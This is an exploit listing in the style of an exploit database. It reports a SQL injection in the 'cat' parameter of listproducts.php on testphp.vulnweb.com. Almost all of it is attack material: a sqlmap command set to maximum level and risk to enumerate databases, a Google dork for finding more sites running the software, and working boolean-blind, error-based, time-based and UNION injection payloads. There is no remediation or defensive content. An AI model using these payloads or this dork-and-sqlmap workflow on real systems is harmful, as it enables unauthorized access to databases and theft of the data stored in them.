**************************** #Exploit Title: TESTPHP - SQL Injection vulnerability #Date: 2020-10-22 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://testphp.vulnweb.com #Google Dork: "Powered by Testphp" #Tested On: windows 10 sqlmap: sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --level=5 --risk=3 --dbs --random-agent Testing Method; - boolean-based blind - time-based blind - error-based - UNION query Parameter: cat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat=1 AND 2865=2865 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: cat=1 AND (SELECT 5765 FROM(SELECT COUNT(*),CONCAT(0x716a767871,(SELECT (ELT(5765=5765,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: cat=1 AND (SELECT 1112 FROM (SELECT(SLEEP(5)))UidW) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a767871,0x6c5862796e47664f6e6b664f57726d6c6a5053734f7574424574414a4657796b5149755148567964,0x716b717a71),NULL,NULL-- - ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************